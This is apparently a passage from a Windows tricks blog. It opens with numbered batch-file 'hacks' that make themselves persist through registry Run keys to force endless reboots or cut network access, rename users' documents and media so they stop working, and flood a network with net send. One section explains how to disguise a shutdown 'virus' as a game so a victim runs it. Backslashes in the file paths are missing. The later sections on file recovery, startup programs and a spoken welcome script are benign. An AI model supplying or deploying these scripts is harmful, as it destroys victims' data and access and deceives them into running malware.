echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

No 18 :-

Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File

No 19 :-

Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


No 20 :-

System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File

No 21:-
Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !

How to Spread it:
Windows does'nt allow to change the icon of .bat files. Therefore what you can do is :
Right click on the .bat file
Click on CREATE SHORTCUT
And hide the original file.
Now as this newly created file is just the shortcut, you can easily change its icon.
Right click on this shortcut
properties >>>..cutomize>>..choose icon
Now give an attractive icon to it.
Now name it something intresting. eg. PROTOTYPE or IGI etc.
Now your victim would think it to be the game , and he will be easily curropted.

How to recover (Ctrl+Alt+Del) permanently deleted file?

Sometimes we delete the files permanently, and realize that those files are important....

For all those folks,
Here is the solution

Software called "Kissass Undelete" , can bring those files from the hard disk or your flash drive.
Conditions : Only if the data on that drive is not re-occupied(or written). that means the space which was available after the deletion is not been occupied after the deletion.

Click Here to download "Kissass Undelete" .
1)
To start searching for the files,
Select the drive from the Left panel of the Windows and Click the scan button.
the Scan might take some time.
2)
When the files search has been completed, it will show you the results with the name, type, size and the last modified date of the searched file.
3) Now you can select the file to be recover. This is an Open source application and available for All Windows OS(Windows XP/Vista/ 7).

ALTERNATIVE
You can also use software Recuva by Piriform Ltd.

How to Disable StartUp Programs in Windows

The more softwares you install on your computer, Windows takes more time to StartUp or boot, Which is quite irritating...
Many programs add themselves to the list of programs started when you boot your computer, and that list has to be controlled to improve the boot speed. By removing unwanted programs from startup we can improve boot speed by considerable amount.

Disabling StartUp Programs in Windows

  • Open Run ( win+r )
  • In the Open box write MSCONFIG and Click OK.
  • Navigate to Startup:
msconfig programs windows
  • Unchecked the programs you don't want to start on start-up.
  • If you don't know which program is useful or which should not be unchecked: See the Manufacturer column (Almost all the Windows manufactured programs should be checked and never disable your graphic driver or sound driver) .
  • Now finally click OK and you are asked to restart your windows, Restart it and your settings are saved.
NOTE: If you are using Windows 8 than open Task Manager and navigate to start-up :

Windows 8: StartUP programs

Right click on program which you don't want to start on system boot and choose Disable.

Make your Computer Welcome You

Computer welcome you
We generally see in movies that the PC of the Actor/Actress welcomes him by calling his/her name.
We also want that our PC should also welcomes us like them.

With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Startup



To use this trick, follow the instructions given below:-


  1. Click on Start. Navigate to All Programs, Accessories and Notepad.
  2. Copy and paste the exact code given below.
Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
     3.  Replace Username with your own name.
     4.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
     5.  Copy the saved file.
     6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
     7.  Paste the file.




 Make your Computer Welcome you at startup

Now when the next time you start your computer, Windows will welcome you in its own computerized voice.

Note: For best results, it is recommended to change sound scheme to No Sounds.
You can change the sound scheme to No Sounds by following the steps given below:-
  1. Go to Control Panel.
  2. Then click on Switch to Classic View.
  3. Then Click on Sounds and Audio Devices.
  4. Then Click on the Sounds Tab.
  5. Select No Sounds from the Sound Scheme option.
  6. If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
  7. Click on OK.
Change Sound Scheme to No Sounds

Try it yourself to see how it works. In my personal opinion, this is an excellent trick. Whenever I start my PC in front of anybody and the PC welcomes me, the fellow is left wondering how brilliant a computer do I have.
Because this is a great trick and Better Tricks, Better Results.....